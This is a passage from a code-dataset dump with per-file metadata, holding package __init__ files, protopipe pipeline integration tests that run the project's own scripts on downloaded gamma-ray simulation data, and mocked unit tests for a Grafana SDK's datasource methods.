] | 1 | 2018-06-12T15:03:12.000Z | 2018-06-12T15:03:12.000Z | Algorithm/__init__.py | icsa-caps/ProtoGen | 639c62947314c427661cb66ebc3ac7e26798fc7e | [
"MIT"
] | 5 | 2018-06-12T14:45:38.000Z | 2021-03-20T06:29:25.000Z | import Algorithm.ProtoAlgorithm
import Algorithm.ProtoConfig
import Algorithm.TraceNode | 29 | 31 | 0.908046 | 9 | 87 | 8.777778 | 0.555556 | 0.56962 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.057471 | 87 | 3 | 32 | 29 | 0.963415 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
c550fa64c0093e0973cd67a8294ff679fcb503b3 | 66 | py | Python | img2bw/__init__.py | salvacarrion/img2bw | 4228bdd0020b7e6ec48b6b1132602505e7f622ee | [
"MIT"
] | 3 | 2020-07-16T08:40:31.000Z | 2022-01-07T14:05:58.000Z | img2bw/__init__.py | salvacarrion/img2bw | 4228bdd0020b7e6ec48b6b1132602505e7f622ee | [
"MIT"
] | 1 | 2021-06-24T05:14:43.000Z | 2021-06-24T05:14:43.000Z | img2bw/__init__.py | salvacarrion/img2bw | 4228bdd0020b7e6ec48b6b1132602505e7f622ee | [
"MIT"
] | 1 | 2021-08-10T04:58:14.000Z | 2021-08-10T04:58:14.000Z | from .main import *
from .binarizer import *
from .utils import *
| 16.5 | 24 | 0.727273 | 9 | 66 | 5.333333 | 0.555556 | 0.416667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.181818 | 66 | 3 | 25 | 22 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
c5558943a964ccce17d3367746199a99a3beaed2 | 15,945 | py | Python | protopipe/scripts/tests/test_pipeline.py | Iburelli/protopipe | 1f392ea5abca6b09b684fca1e4ff3b138faa0b5a | [
"CECILL-B"
] | null | null | null | protopipe/scripts/tests/test_pipeline.py | Iburelli/protopipe | 1f392ea5abca6b09b684fca1e4ff3b138faa0b5a | [
"CECILL-B"
] | null | null | null | protopipe/scripts/tests/test_pipeline.py | Iburelli/protopipe | 1f392ea5abca6b09b684fca1e4ff3b138faa0b5a | [
"CECILL-B"
] | null | null | null | from pathlib import Path
from os import system
from pkg_resources import resource_filename
import tables
import pytest
from ctapipe.utils.datasets import get_dataset_path
from protopipe.scripts import (
data_training,
build_model,
write_dl2,
make_performance_EventDisplay,
)
# PROD 3B
# CONFIG FILES
config_prod3b_CTAN = resource_filename(
"protopipe", "scripts/tests/test_config_analysis_north.yaml"
)
config_prod3b_CTAS = resource_filename(
"protopipe", "scripts/tests/test_config_analysis_south.yaml"
)
config_AdaBoostRegressor = resource_filename(
"protopipe", "scripts/tests/test_AdaBoostRegressor.yaml"
)
config_RandomForestRegressor = resource_filename(
"protopipe", "scripts/tests/test_RandomForestRegressor.yaml"
)
config_RandomForestClassifier = resource_filename(
"protopipe", "scripts/tests/test_RandomForestClassifier.yaml"
)
config_DL3_ED_prod3b = resource_filename(
"protopipe", "scripts/tests/test_performance_ED_prod3b.yaml"
)
# TEST FILES
URL_TEST_DATA = "http://cccta-dataserver.in2p3.fr/data/protopipe/testData/"
URL_PROD3B_CTAN = f"{URL_TEST_DATA}/prod3_laPalma_baseline_Az180_Zd20"
URL_PROD3B_CTAS = f"{URL_TEST_DATA}/prod3_Paranal_baseline_Az180_Zd20"
input_data = {
"PROD3B_CTA_NORTH": {
"config": config_prod3b_CTAN,
"gamma1": get_dataset_path("gamma1.simtel.gz", url=f"{URL_PROD3B_CTAN}"),
"gamma2": get_dataset_path("gamma2.simtel.gz", url=f"{URL_PROD3B_CTAN}"),
"gamma3": get_dataset_path("gamma3.simtel.gz", url=f"{URL_PROD3B_CTAN}"),
"proton1": get_dataset_path("proton1.simtel.gz", url=f"{URL_PROD3B_CTAN}"),
"proton2": get_dataset_path("proton2.simtel.gz", url=f"{URL_PROD3B_CTAN}"),
"electron1": get_dataset_path("electron1.simtel.gz", url=f"{URL_PROD3B_CTAN}"),
},
"PROD3B_CTA_SOUTH": {
"config": config_prod3b_CTAS,
"gamma1": get_dataset_path("gamma1.simtel.gz", url=f"{URL_PROD3B_CTAS}"),
"gamma2": get_dataset_path("gamma2.simtel.gz", url=f"{URL_PROD3B_CTAS}"),
"gamma3": get_dataset_path("gamma3.simtel.gz", url=f"{URL_PROD3B_CTAS}"),
"proton1": get_dataset_path("proton1.simtel.gz", url=f"{URL_PROD3B_CTAS}"),
"proton2": get_dataset_path("proton2.simtel.gz", url=f"{URL_PROD3B_CTAS}"),
"electron1": get_dataset_path("electron1.simtel.gz", url=f"{URL_PROD3B_CTAS}"),
},
}
@pytest.mark.parametrize("test_case", ["PROD3B_CTA_NORTH", "PROD3B_CTA_SOUTH"])
def test_GET_GAMMAS_FOR_ENERGY_MODEL_WITH_IMAGES(test_case, pipeline_testdir):
outpath = pipeline_testdir / f"test_training_withImages_{test_case}.h5"
command = f"python {data_training.__file__}\
--config_file {input_data[test_case]['config']}\
-o {outpath}\
--save_images\
-i {input_data[test_case]['gamma1'].parent}\
-f {input_data[test_case]['gamma1'].name}"
print( # only with "pytest -s"
f"""
You can reproduce this test by running the following command,
{command}
"""
)
exit_status = system(command)
# check that the script ends without crashing
assert exit_status == 0
# check that the produced HDF5 file is non-empty
with tables.open_file(outpath) as file:
assert file.get_filesize() > 0
@pytest.mark.parametrize(
"test_case",
[
pytest.param("PROD3B_CTA_NORTH", marks=pytest.mark.dependency(name="g1N")),
pytest.param("PROD3B_CTA_SOUTH", marks=pytest.mark.dependency(name="g1S")),
],
)
def test_GET_GAMMAS_FOR_ENERGY_MODEL(test_case, pipeline_testdir):
outpath = pipeline_testdir / f"test_gamma1_noImages_{test_case}.h5"
command = f"python {data_training.__file__}\
--config_file {input_data[test_case]['config']}\
-o {outpath}\
-i {input_data[test_case]['gamma1'].parent}\
-f {input_data[test_case]['gamma1'].name}"
print( # only with "pytest -s"
f"""
You can reproduce this test by running the following command,
{command}
"""
)
exit_status = system(command)
# check that the script ends without crashing
assert exit_status == 0
# sanity checks on the produced HDF5 file
with tables.open_file(outpath) as file:
assert file.get_filesize() > 0
assert file.root._v_attrs["status"] == "complete"
@pytest.mark.parametrize(
"test_case",
[
pytest.param(
"PROD3B_CTA_NORTH",
marks=pytest.mark.dependency(name="EN_1", depends=["g1N"]),
),
pytest.param(
"PROD3B_CTA_SOUTH",
marks=pytest.mark.dependency(name="ES_1", depends=["g1S"]),
),
],
)
def test_BUILD_ENERGY_MODEL_AdaBoost_DecisionTreeRegressor(test_case, pipeline_testdir):
"""Launch protopipe.scripts.build_model for a AdaBoostRegressor based on DecisionTreeRegressor."""
infile = pipeline_testdir / f"test_gamma1_noImages_{test_case}.h5"
outdir = pipeline_testdir / f"energy_model_{test_case}"
command = f"python {build_model.__file__}\
--config_file {config_AdaBoostRegressor}\
--infile_signal {infile}\
--outdir {outdir}\
--cameras_from_file"
print( # only with "pytest -s"
f"""
You can reproduce this test by running the following command,
{command}
"""
)
exit_status = system(command)
assert exit_status == 0
@pytest.mark.parametrize(
"test_case",
[
pytest.param(
"PROD3B_CTA_NORTH",
marks=pytest.mark.dependency(name="EN_2", depends=["g1N"]),
),
pytest.param(
"PROD3B_CTA_SOUTH",
marks=pytest.mark.dependency(name="ES_2", depends=["g1S"]),
),
],
)
def test_BUILD_ENERGY_MODEL_RandomForestRegressor(test_case, pipeline_testdir):
"""Launch protopipe.scripts.build_model for a RandomForestRegressor."""
infile = pipeline_testdir / f"test_gamma1_noImages_{test_case}.h5"
outdir = pipeline_testdir / f"energy_model_{test_case}"
command = f"python {build_model.__file__}\
--config_file {config_RandomForestRegressor}\
--infile_signal {infile}\
--outdir {outdir}\
--cameras_from_file"
print( # only with "pytest -s"
f"""
You can reproduce this test by running the following command,
{command}
"""
)
exit_status = system(command)
assert exit_status == 0
@pytest.mark.parametrize(
"test_case",
[
pytest.param(
"PROD3B_CTA_NORTH",
marks=pytest.mark.dependency(name="g2N", depends=["EN_2"]),
),
pytest.param(
"PROD3B_CTA_SOUTH",
marks=pytest.mark.dependency(name="g2S", depends=["ES_2"]),
),
],
)
def test_GET_GAMMAS_FOR_CLASSIFICATION_MODEL(test_case, pipeline_testdir):
modelpath = pipeline_testdir / f"energy_model_{test_case}"
outpath = pipeline_testdir / f"test_gamma2_noImages_{test_case}.h5"
command = f"python {data_training.__file__}\
--config_file {input_data[test_case]['config']}\
-o {outpath}\
-i {input_data[test_case]['gamma2'].parent}\
-f {input_data[test_case]['gamma2'].name}\
--estimate_energy True\
--regressor_config {config_RandomForestRegressor}\
--regressor_dir {modelpath}"
print( # only with "pytest -s"
f"""
You can reproduce this test by running the following command,
{command}
"""
)
exit_status = system(command)
# check that the script ends without crashing
assert exit_status == 0
# check that the produced HDF5 file is non-empty
with tables.open_file(outpath) as file:
assert file.get_filesize() > 0
@pytest.mark.parametrize(
"test_case",
[
pytest.param(
"PROD3B_CTA_NORTH",
marks=pytest.mark.dependency(name="p1N", depends=["EN_2"]),
),
pytest.param(
"PROD3B_CTA_SOUTH",
marks=pytest.mark.dependency(name="p1S", depends=["ES_2"]),
),
],
)
def test_GET_PROTONS_FOR_CLASSIFICATION_MODEL(test_case, pipeline_testdir):
modelpath = pipeline_testdir / f"energy_model_{test_case}"
outpath = pipeline_testdir / f"test_proton1_noImages_{test_case}.h5"
command = f"python {data_training.__file__}\
--config_file {input_data[test_case]['config']}\
-o {outpath}\
-i {input_data[test_case]['proton1'].parent}\
-f {input_data[test_case]['proton1'].name}\
--estimate_energy True\
--regressor_config {config_RandomForestRegressor}\
--regressor_dir {modelpath}"
print( # only with "pytest -s"
f"""
You can reproduce this test by running the following command,
{command}
"""
)
exit_status = system(command)
# check that the script ends without crashing
assert exit_status == 0
# check that the produced HDF5 file is non-empty
with tables.open_file(outpath) as file:
assert file.get_filesize() > 0
@pytest.mark.parametrize(
"test_case",
[
pytest.param(
"PROD3B_CTA_NORTH",
marks=pytest.mark.dependency(name="C1", depends=["g2N", "p1N"]),
),
pytest.param(
"PROD3B_CTA_SOUTH",
marks=pytest.mark.dependency(name="C2", depends=["g2S", "p1S"]),
),
],
)
def test_BUILD_CLASSIFICATION_MODEL_RandomForestClassifier(test_case, pipeline_testdir):
"""Launch protopipe.scripts.build_model for a Random Forest classifier."""
infile_signal = pipeline_testdir / f"test_gamma2_noImages_{test_case}.h5"
infile_background = pipeline_testdir / f"test_proton1_noImages_{test_case}.h5"
outdir = pipeline_testdir / f"classification_model_{test_case}"
command = f"python {build_model.__file__}\
--config_file {config_RandomForestClassifier}\
--infile_signal {infile_signal}\
--infile_background {infile_background}\
--outdir {outdir}\
--cameras_from_file"
print( # only with "pytest -s"
f"""
You can reproduce this test by running the following command,
{command}
"""
)
exit_status = system(command)
assert exit_status == 0
@pytest.mark.parametrize(
"test_case",
[
pytest.param(
"PROD3B_CTA_NORTH", marks=pytest.mark.dependency(name="g3N", depends=["C1"])
),
pytest.param(
"PROD3B_CTA_SOUTH", marks=pytest.mark.dependency(name="g3S", depends=["C2"])
),
],
)
def test_GET_DL2_GAMMAS(test_case, pipeline_testdir):
regressor_path = pipeline_testdir / f"energy_model_{test_case}"
classifier_path = pipeline_testdir / f"classification_model_{test_case}"
outpath = pipeline_testdir / f"test_DL2_tail_gamma_noImages_{test_case}.h5"
command = f"python {write_dl2.__file__}\
--config_file {input_data[test_case]['config']}\
-o {outpath}\
-i {input_data[test_case]['gamma3'].parent}\
-f {input_data[test_case]['gamma3'].name}\
--regressor_config {config_RandomForestRegressor}\
--regressor_dir {regressor_path}\
--classifier_config {config_RandomForestClassifier}\
--classifier_dir {classifier_path}"
print( # only with "pytest -s"
f"""
You can reproduce this test by running the following command,
{command}
"""
)
exit_status = system(command)
# check that the script ends without crashing
assert exit_status == 0
# sanity checks on the produced HDF5 file
with tables.open_file(outpath) as file:
assert file.get_filesize() > 0
assert file.root._v_attrs["status"] == "complete"
@pytest.mark.parametrize(
"test_case",
[
pytest.param(
"PROD3B_CTA_NORTH", marks=pytest.mark.dependency(name="p2N", depends=["C1"])
),
pytest.param(
"PROD3B_CTA_SOUTH", marks=pytest.mark.dependency(name="p2S", depends=["C2"])
),
],
)
def test_GET_DL2_PROTONS(test_case, pipeline_testdir):
regressor_path = pipeline_testdir / f"energy_model_{test_case}"
classifier_path = pipeline_testdir / f"classification_model_{test_case}"
outpath = pipeline_testdir / f"test_DL2_tail_proton_noImages_{test_case}.h5"
command = f"python {write_dl2.__file__}\
--config_file {input_data[test_case]['config']}\
-o {outpath}\
-i {input_data[test_case]['proton2'].parent}\
-f {input_data[test_case]['proton2'].name}\
--regressor_config {config_RandomForestRegressor}\
--regressor_dir {regressor_path}\
--classifier_config {config_RandomForestClassifier}\
--classifier_dir {classifier_path}"
print( # only with "pytest -s"
f"""
You can reproduce this test by running the following command,
{command}
"""
)
exit_status = system(command)
# check that the script ends without crashing
assert exit_status == 0
# sanity checks on the produced HDF5 file
with tables.open_file(outpath) as file:
assert file.get_filesize() > 0
assert file.root._v_attrs["status"] == "complete"
@pytest.mark.parametrize(
"test_case",
[
pytest.param(
"PROD3B_CTA_NORTH", marks=pytest.mark.dependency(name="elN", depends=["C1"])
),
pytest.param(
"PROD3B_CTA_SOUTH", marks=pytest.mark.dependency(name="elS", depends=["C2"])
),
],
)
def test_GET_DL2_ELECTRONS(test_case, pipeline_testdir):
regressor_path = pipeline_testdir / f"energy_model_{test_case}"
classifier_path = pipeline_testdir / f"classification_model_{test_case}"
outpath = pipeline_testdir / f"test_DL2_tail_electron_noImages_{test_case}.h5"
command = f"python {write_dl2.__file__}\
--config_file {input_data[test_case]['config']}\
-o {outpath}\
-i {input_data[test_case]['electron1'].parent}\
-f {input_data[test_case]['electron1'].name}\
--regressor_config {config_RandomForestRegressor}\
--regressor_dir {regressor_path}\
--classifier_config {config_RandomForestClassifier}\
--classifier_dir {classifier_path}"
print( # only with "pytest -s"
f"""
You can reproduce this test by running the following command,
{command}
"""
)
exit_status = system(command)
# check that the script ends without crashing
assert exit_status == 0
# sanity checks on the produced HDF5 file
with tables.open_file(outpath) as file:
assert file.get_filesize() > 0
assert file.root._v_attrs["status"] == "complete"
@pytest.mark.parametrize(
"test_case",
[
pytest.param(
"PROD3B_CTA_NORTH",
marks=pytest.mark.dependency(name="DL3N", depends=["g3N", "p2N", "elN"]),
),
pytest.param(
"PROD3B_CTA_SOUTH",
marks=pytest.mark.dependency(name="DL3S", depends=["g3S", "p2S", "elS"]),
),
],
)
def test_GET_DL3_ED_prod3b(test_case, pipeline_testdir):
template_input_file = f"test_DL2_{{}}_{{}}_noImages_{test_case}.h5"
command = f"python {make_performance_EventDisplay.__file__}\
--config_file {config_DL3_ED_prod3b}\
--indir_parent {pipeline_testdir}\
--outdir_path {pipeline_testdir}\
--out_file_name 'test_DL3_{test_case}'\
--template_input_file {template_input_file}"
print( # only with "pytest -s"
f"""
You can reproduce this test by running the following command,
{command}
"""
)
exit_status = system(command)
# check that the script ends without crashing
assert exit_status == 0
# check that the output file exists and it is not empty
path = Path(pipeline_testdir) / f"test_DL3_{test_case}.fits.gz"
assert path.exists() and (path.stat().st_size > 0)
from astropy.io import fits
with fits.open(path) as hdul:
assert len(hdul) == 19 # check that all HDUs are there
for hdu in hdul[1:]:
assert hdu.size > 0 # check presence of data
| 30.604607 | 102 | 0.662716 | 1,935 | 15,945 | 5.155556 | 0.10491 | 0.054531 | 0.036889 | 0.035786 | 0.825882 | 0.811949 | 0.772855 | 0.750802 | 0.73757 | 0.71672 | 0 | 0.016258 | 0.213045 | 15,945 | 520 | 103 | 30.663462 | 0.77877 | 0.079147 | 0 | 0.605063 | 0 | 0 | 0.250615 | 0.078573 | 0 | 0 | 0 | 0 | 0.063291 | 1 | 0.027848 | false | 0 | 0.020253 | 0 | 0.048101 | 0.027848 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
3d9cd23d91423db9039803de218c1b03f9c82210 | 21,107 | py | Python | tests/unittests/test_datasource.py | ZPascal/grafana_api_sdk | 97c347790200e8e9a2aafd47e322297aa97b964c | [
"Apache-2.0"
] | 2 | 2022-02-01T20:18:48.000Z | 2022-02-02T01:22:14.000Z | tests/unittests/test_datasource.py | ZPascal/grafana_api_sdk | 97c347790200e8e9a2aafd47e322297aa97b964c | [
"Apache-2.0"
] | 5 | 2022-01-12T06:55:54.000Z | 2022-03-26T13:35:50.000Z | tests/unittests/test_datasource.py | ZPascal/grafana_api_sdk | 97c347790200e8e9a2aafd47e322297aa97b964c | [
"Apache-2.0"
] | null | null | null | from unittest import TestCase
from unittest.mock import MagicMock, Mock, patch
from src.grafana_api.model import APIModel, DatasourceQuery
from src.grafana_api.datasource import Datasource
class DatasourceTestCase(TestCase):
@patch("src.grafana_api.api.Api.call_the_api")
def test_get_all_datasources(self, call_the_api_mock):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
mock: Mock = Mock()
mock.json = Mock(return_value=list([{"id": 1}]))
call_the_api_mock.return_value = mock
self.assertEqual([{"id": 1}], datasource.get_all_datasources())
@patch("src.grafana_api.api.Api.call_the_api")
def test_get_all_datasources_no_datasources(self, call_the_api_mock):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
mock: Mock = Mock()
mock.json = Mock(return_value=list())
call_the_api_mock.return_value = mock
with self.assertRaises(Exception):
datasource.get_all_datasources()
@patch("src.grafana_api.api.Api.call_the_api")
def test_get_datasource_by_id(self, call_the_api_mock):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
mock: Mock = Mock()
mock.json = Mock(return_value=dict({"id": 1}))
call_the_api_mock.return_value = mock
self.assertEqual({"id": 1}, datasource.get_datasource_by_id(1))
def test_get_datasource_by_id_no_datasource_id(self):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
with self.assertRaises(ValueError):
datasource.get_datasource_by_id(0)
@patch("src.grafana_api.api.Api.call_the_api")
def test_get_datasource_by_id_no_datasource_available(self, call_the_api_mock):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
mock: Mock = Mock()
mock.json = Mock(return_value=dict())
call_the_api_mock.return_value = mock
with self.assertRaises(Exception):
datasource.get_datasource_by_id(1)
@patch("src.grafana_api.api.Api.call_the_api")
def test_get_datasource_by_uid(self, call_the_api_mock):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
mock: Mock = Mock()
mock.json = Mock(return_value=dict({"id": 1}))
call_the_api_mock.return_value = mock
self.assertEqual({"id": 1}, datasource.get_datasource_by_uid("test"))
def test_get_datasource_by_uid_no_uid(self):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
with self.assertRaises(ValueError):
datasource.get_datasource_by_uid("")
@patch("src.grafana_api.api.Api.call_the_api")
def test_get_datasource_by_uid_no_datasource_available(self, call_the_api_mock):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
mock: Mock = Mock()
mock.json = Mock(return_value=dict())
call_the_api_mock.return_value = mock
with self.assertRaises(Exception):
datasource.get_datasource_by_uid("test")
@patch("src.grafana_api.api.Api.call_the_api")
def test_get_datasource_by_name(self, call_the_api_mock):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
mock: Mock = Mock()
mock.json = Mock(return_value=dict({"id": 1}))
call_the_api_mock.return_value = mock
self.assertEqual({"id": 1}, datasource.get_datasource_by_name("test"))
def test_get_datasource_by_name_no_name(self):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
with self.assertRaises(ValueError):
datasource.get_datasource_by_name("")
@patch("src.grafana_api.api.Api.call_the_api")
def test_get_datasource_by_name_no_datasource_available(self, call_the_api_mock):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
mock: Mock = Mock()
mock.json = Mock(return_value=dict())
call_the_api_mock.return_value = mock
with self.assertRaises(Exception):
datasource.get_datasource_by_name("test")
@patch("src.grafana_api.api.Api.call_the_api")
def test_get_datasource_id_by_name(self, call_the_api_mock):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
mock: Mock = Mock()
mock.json = Mock(return_value=dict({"id": 1}))
call_the_api_mock.return_value = mock
self.assertEqual(1, datasource.get_datasource_id_by_name("test"))
def test_get_datasource_id_by_name_no_name(self):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
with self.assertRaises(ValueError):
datasource.get_datasource_id_by_name("")
@patch("src.grafana_api.api.Api.call_the_api")
def test_get_datasource_id_by_name_no_id_available(self, call_the_api_mock):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
mock: Mock = Mock()
mock.json = Mock(return_value=dict())
call_the_api_mock.return_value = mock
with self.assertRaises(Exception):
datasource.get_datasource_id_by_name("test")
@patch("src.grafana_api.api.Api.call_the_api")
def test_create_datasource(self, call_the_api_mock):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
mock: Mock = Mock()
mock.json = Mock(return_value=dict({"message": "Datasource added"}))
call_the_api_mock.return_value = mock
self.assertEqual(None, datasource.create_datasource(dict({"test": "test"})))
def test_create_datasource_no_data_source(self):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
with self.assertRaises(ValueError):
datasource.create_datasource(dict())
@patch("src.grafana_api.api.Api.call_the_api")
def test_create_datasource_not_possible(self, call_the_api_mock):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
mock: Mock = Mock()
mock.json = Mock(return_value=dict())
call_the_api_mock.return_value = mock
with self.assertRaises(Exception):
datasource.create_datasource(dict({"test": "test"}))
@patch("src.grafana_api.api.Api.call_the_api")
def test_update_datasource(self, call_the_api_mock):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
mock: Mock = Mock()
mock.json = Mock(return_value=dict({"message": "Datasource updated"}))
call_the_api_mock.return_value = mock
self.assertEqual(None, datasource.update_datasource(1, dict({"test": "test"})))
def test_update_datasource_no_data_source(self):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
with self.assertRaises(ValueError):
datasource.update_datasource(1, dict())
@patch("src.grafana_api.api.Api.call_the_api")
def test_update_datasource_update_not_possible(self, call_the_api_mock):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
mock: Mock = Mock()
mock.json = Mock(return_value=dict())
call_the_api_mock.return_value = mock
with self.assertRaises(Exception):
datasource.update_datasource(1, dict({"test": "test"}))
@patch("src.grafana_api.api.Api.call_the_api")
def test_delete_datasource_by_id(self, call_the_api_mock):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
mock: Mock = Mock()
mock.json = Mock(return_value=dict({"message": "Data source deleted"}))
call_the_api_mock.return_value = mock
self.assertEqual(None, datasource.delete_datasource_by_id(1))
def test_delete_datasource_by_id_no_datasource_id(self):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
with self.assertRaises(ValueError):
datasource.delete_datasource_by_id(0)
@patch("src.grafana_api.api.Api.call_the_api")
def test_delete_datasource_by_id_delete_not_possible(self, call_the_api_mock):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
mock: Mock = Mock()
mock.json = Mock(return_value=dict())
call_the_api_mock.return_value = mock
with self.assertRaises(Exception):
datasource.delete_datasource_by_id(1)
@patch("src.grafana_api.api.Api.call_the_api")
def test_delete_datasource_by_uid(self, call_the_api_mock):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
mock: Mock = Mock()
mock.json = Mock(return_value=dict({"message": "Data source deleted"}))
call_the_api_mock.return_value = mock
self.assertEqual(None, datasource.delete_datasource_by_uid("test"))
def test_delete_datasource_by_uid_no_datasource_uid(self):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
with self.assertRaises(ValueError):
datasource.delete_datasource_by_uid("")
@patch("src.grafana_api.api.Api.call_the_api")
def test_delete_datasource_by_uid_delete_not_possible(self, call_the_api_mock):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
mock: Mock = Mock()
mock.json = Mock(return_value=dict())
call_the_api_mock.return_value = mock
with self.assertRaises(Exception):
datasource.delete_datasource_by_uid("test")
@patch("src.grafana_api.api.Api.call_the_api")
def test_delete_datasource_by_name(self, call_the_api_mock):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
mock: Mock = Mock()
mock.json = Mock(return_value=dict({"message": "Data source deleted"}))
call_the_api_mock.return_value = mock
self.assertEqual(None, datasource.delete_datasource_by_name("test"))
def test_delete_datasource_by_name_no_name(self):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
with self.assertRaises(ValueError):
datasource.delete_datasource_by_name("")
@patch("src.grafana_api.api.Api.call_the_api")
def test_delete_datasource_by_name_delete_not_possible(self, call_the_api_mock):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
mock: Mock = Mock()
mock.json = Mock(return_value=dict())
call_the_api_mock.return_value = mock
with self.assertRaises(Exception):
datasource.delete_datasource_by_name("test")
@patch("src.grafana_api.api.Api.call_the_api")
def test_query_datasource_by_id(self, call_the_api_mock):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
mock: Mock = Mock()
mock.json = Mock(return_value=dict({"results": dict({"test": "test"})}))
call_the_api_mock.return_value = mock
datasource_query: DatasourceQuery = DatasourceQuery(1, "test")
datasource_queries: list = list()
datasource_queries.append(datasource_query)
self.assertEqual(
dict({"test": "test"}),
datasource.query_datasource_by_id("1234", "1234", datasource_queries),
)
def test_query_datasource_by_id_no_time(self):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
with self.assertRaises(ValueError):
datasource.query_datasource_by_id("", "", MagicMock())
@patch("src.grafana_api.api.Api.call_the_api")
def test_query_datasource_by_id_no_query_result(self, call_the_api_mock):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
datasource_query: DatasourceQuery = DatasourceQuery(1, "test")
datasource_queries: list = list()
datasource_queries.append(datasource_query)
mock: Mock = Mock()
mock.json = Mock(return_value=dict())
call_the_api_mock.return_value = mock
with self.assertRaises(Exception):
datasource.query_datasource_by_id("1234", "1234", datasource_queries)
@patch("src.grafana_api.api.Api.call_the_api")
def test_enable_datasource_permissions(self, call_the_api_mock):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
mock: Mock = Mock()
mock.json = Mock(
return_value=dict({"message": "Datasource permissions enabled"})
)
call_the_api_mock.return_value = mock
self.assertEqual(None, datasource.enable_datasource_permissions(1))
def test_enable_datasource_permissions_no_datasource_id(self):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
with self.assertRaises(ValueError):
datasource.enable_datasource_permissions(0)
@patch("src.grafana_api.api.Api.call_the_api")
def test_enable_datasource_permissions_enable_not_possible(self, call_the_api_mock):
model: APIModel = APIModel(host=MagicMock(), token=MagicMock())
datasource: Datasource = Datasource(grafana_api_model=model)
mock: Mock = Mock()
mock.json = Mock(return_value=dict())
call_the_api_mock.return_value = mock
with self.assertRaises(Exception):
datasource.enable_datasource_permissions(1)
@patch("src.grafana_api.api.Api.call_the_api")
def test_disable_datasource_permissions(self, call_the_api_mock):
